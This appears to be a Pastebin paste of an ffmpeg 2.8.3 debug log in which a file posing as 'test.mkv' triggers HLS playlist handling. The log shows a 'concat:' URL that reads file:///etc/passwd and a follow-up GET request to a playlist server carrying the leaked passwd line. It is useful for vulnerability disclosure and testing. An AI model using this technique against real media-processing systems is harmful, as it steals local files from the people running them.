Advertisement
Guest User

Untitled

a guest
Jan 13th, 2016
438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.86 KB | None | 0 0
  1. ffmpeg version 2.8.3 Copyright (c) 2000-2015 the FFmpeg developers
  2. built with gcc 4.8 (Ubuntu 4.8.4-2ubuntu1~14.04)
  3. configuration: --prefix=/opt/ffmpeg --libdir=/opt/ffmpeg/lib/ --enable-shared --enable-avresample --disable-stripping --enable-gpl --enable-version3 --enable-nonfree --enable-runtime-cpudetect --build-suffix=.ffmpeg --enable-postproc --enable-x11grab --enable-avisynth --enable-bzlib --enable-fontconfig --enable-frei0r --enable-gnutls --enable-ladspa --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libdc1394 --enable-libfaac --enable-libfdk_aac --enable-libflite --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libmodplug --enable-libmp3lame --enable-libopencore-amrnb --enable-libopencore-amrwb --enable-libopus --enable-libpulse --enable-librtmp --enable-libschroedinger --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libvo-aacenc --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx264 --enable-libx265 --enable-libkvazaar --enable-libxvid --enable-libzmq --enable-libzvbi --enable-openal --enable-opengl --enable-pthreads --enable-vaapi --enable-vdpau --enable-zlib --enable-debug=3
  4. libavutil 54. 31.100 / 54. 31.100
  5. libavcodec 56. 60.100 / 56. 60.100
  6. libavformat 56. 40.101 / 56. 40.101
  7. libavdevice 56. 4.100 / 56. 4.100
  8. libavfilter 5. 40.101 / 5. 40.101
  9. libavresample 2. 1. 0 / 2. 1. 0
  10. libswscale 3. 1.101 / 3. 1.101
  11. libswresample 1. 2.101 / 1. 2.101
  12. libpostproc 53. 3.100 / 53. 3.100
  13. Splitting the commandline.
  14. Reading option '-v' ... matched as option 'v' (set logging level) with argument 'debug'.
  15. Reading option '-i' ... matched as input file with argument 'test.mkv'.
  16. Reading option 'out.avi' ... matched as output file.
  17. Reading option '-y' ... matched as option 'y' (overwrite output files) with argument '1'.
  18. Finished splitting the commandline.
  19. Parsing a group of options: global .
  20. Applying option v (set logging level) with argument debug.
  21. Applying option y (overwrite output files) with argument 1.
  22. Successfully parsed a group of options.
  23. Parsing a group of options: input file test.mkv.
  24. Successfully parsed a group of options.
  25. Opening an input file: test.mkv.
  26. [hls,applehttp @ 0x96ec20] Format hls,applehttp probed with size=2048 and score=100
  27. [hls,applehttp @ 0x96ec20] HLS request for url 'concat:http://localhost/header.m3u8|file:///etc/passwd', offset 0, playlist 0
  28. [http @ 0x972be0] request: GET /header.m3u8 HTTP/1.1
  29. User-Agent: Lavf/56.40.101
  30. Accept: */*
  31. Range: bytes=0-
  32. Connection: close
  33. Host: localhost
  34. Icy-MetaData: 1
  35.  
  36.  
  37. Format hls,applehttp probed with size=2048 and score=100
  38. [http @ 0x972780] request: GET /header.m3u8 HTTP/1.1
  39. User-Agent: Lavf/56.40.101
  40. Accept: */*
  41. Range: bytes=0-
  42. Connection: close
  43. Host: localhost
  44. Icy-MetaData: 1
  45.  
  46.  
  47. [AVIOContext @ 0x973460] Statistics: 2371 bytes read, 0 seeks
  48. [hls,applehttp @ 0x971a80] HLS request for url 'http://localhost/remote.m3u8?root:x:0:0:root:/root:/bin/bash', offset 0, playlist 0
  49. [http @ 0x972820] request: GET /remote.m3u8?root:x:0:0:root:/root:/bin/bash HTTP/1.1
  50. User-Agent: Lavf/56.40.101
  51. Accept: */*
  52. Connection: close
  53. Host: localhost
  54. Icy-MetaData: 1
  55.  
  56.  
  57. [http @ 0x973460] request: GET /header.m3u8 HTTP/1.1
  58. User-Agent: Lavf/56.40.101
  59. Accept: */*
  60. Range: bytes=0-
  61. Connection: close
  62. Host: localhost
  63. Icy-MetaData: 1
  64.  
  65.  
  66. [AVIOContext @ 0x973620] Statistics: 2371 bytes read, 0 seeks
  67. [http @ 0x977400] request: GET /header.m3u8 HTTP/1.1
  68. User-Agent: Lavf/56.40.101
  69. Accept: */*
  70. Range: bytes=0-
  71. Connection: close
  72. Host: localhost
  73. Icy-MetaData: 1
  74.  
  75.  
  76. [AVIOContext @ 0x9774c0] Statistics: 2371 bytes read, 0 seeks
  77. [http @ 0x977440] request: GET /header.m3u8 HTTP/1.1
  78. User-Agent: Lavf/56.40.101
  79. Accept: */*
  80. Range: bytes=0-
  81. Connection: close
  82. Host: localhost
  83. Icy-MetaData: 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement